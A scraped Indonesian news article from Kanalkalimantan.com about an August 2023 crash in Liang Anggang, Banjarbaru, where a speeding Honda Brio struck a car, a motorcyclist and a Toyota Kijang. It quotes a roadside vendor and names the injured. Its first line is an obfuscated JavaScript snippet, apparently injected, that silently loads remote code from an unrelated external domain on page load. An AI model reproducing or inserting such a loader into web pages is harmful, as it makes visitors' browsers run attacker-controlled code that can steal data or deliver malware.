(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Brio Tabrak Pemotor lalu Seruduk Kijang di Km 18 Liang Anggang


KANALKALIMANTAN.COM, BANJARBARU – Sebuah video amatir merekam kejadian kecelakaan lalu lintas (Laka Lantas) di jalan A Yani Km 18 Kecamatan Liang Anggang, Kota Banjarbaru, Sabtu (26/8/2023), mendadak viral di media sosial.

Kecelakaan itu melibatkan dua buah mobil dan sebuah sepeda motor, ditabrak oleh sebuah mobil Honda Brio hitam yang tengah oleng.

Geceng, seorang pedagang es buah yang persis berada di pinggir jalan itu mengatakan mobil Honda Brio hitam itu sudah bergerak laju dari arah Banjarmasin menuju Banjarbaru.

Baca juga: Remaja Tak Bernyawa Tenggelam di Danau KCG Banjarbaru

“Dia (Honda Brio, red) laju dari ujung sana, gak ada yang lagi putar balik atau apa cuman si mobil ini sudah laju dari jauh,” ujar Geceng kepada Kanalkalimantan.com.

Tepat saat berada di depan halte bus timbangan Liang Anggang, mobil yang nampak dengan kecepatan penuh itu oleng ke kiri menabrak mobil Daihatsu Calya berwarna hitam.

Tak sampai di situ, mobil kemudian terus melaju di lajur kiri hingga menyeret pengendara motor yang tengah menghindar ke arah kiri.

Baca juga: Temuan Kasus DBD, Desa Sungai Gita Difogging

“Pokoknya saya lihat motor di sebelah kiri itu terdorong, dia (Honda Brio, red) banting stirnya ke arah kanan,” katanya.

Terakhir mobil itu kemudian oleng ke kanan menabrak sebuah Toyota Kijang bernopol DA 1389 LI hingga berakhir menyeruduk median pembatas jalan.

Dia mengatakan jika mobil itu dikemudikan seorang lelaki yang saat dievakuasi tampak sudah tidak sadarkan diri dan dilarikan ke rumah sakit.

Baca juga: Asap Polusi Udara Ancaman Kesehatan, Puskesmas Gambut Bagikan Masker

“Tadi saya lihat pengemudinya dibawa ke rumah sakit seperti tidak sadar lagi, kalau korban perempuan (sepeda motor, red) sempat pingsan saja dan mengalami luka-luka untung aja pakai helm,” jelas saksi mata ini.

Menurut penjual es ini, daerah itu memang rawan terjadi kecelakaan, terlebih mobil yang datang dari arah Banjarmasin kerap mengemudikan dengan kecepatan tinggi.

“Apalagi persis berdekatan dengan putar balik arah ini, sudah berapa kali kejadian dalam seminggu itu saja bisa hampir empat kali kejadian,” ungkap Geceng.

Baca juga: 26 Agustus Hari Kesetaraan Perempuan, Ini Sejarahnya

Lebih jauh saat kejadian, mobil Honda Brio hitam itu diketahui tengah dikemudikan oleh Hasbianur (57), warga Batibati, Kabupaten Tanah Laut.

Sedangkan pengendara sepeda motor yang menjadi korban ialah seorang mahasiswi baru di Universitas Lambung Mangkurat Banjarmasin bernama Iis (18).

Atas kejadian ini pun dua orang korban yakni pengemudi mobil dan pengendara motor harus dilarikan ke IGD RSI Sultan Agung Kota Citra Graha Banjarbaru untuk menjalani perawatan. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor: bie


Muhammad Andi

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

9 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

10 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

10 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

10 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

11 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

11 jam ago

This website uses cookies.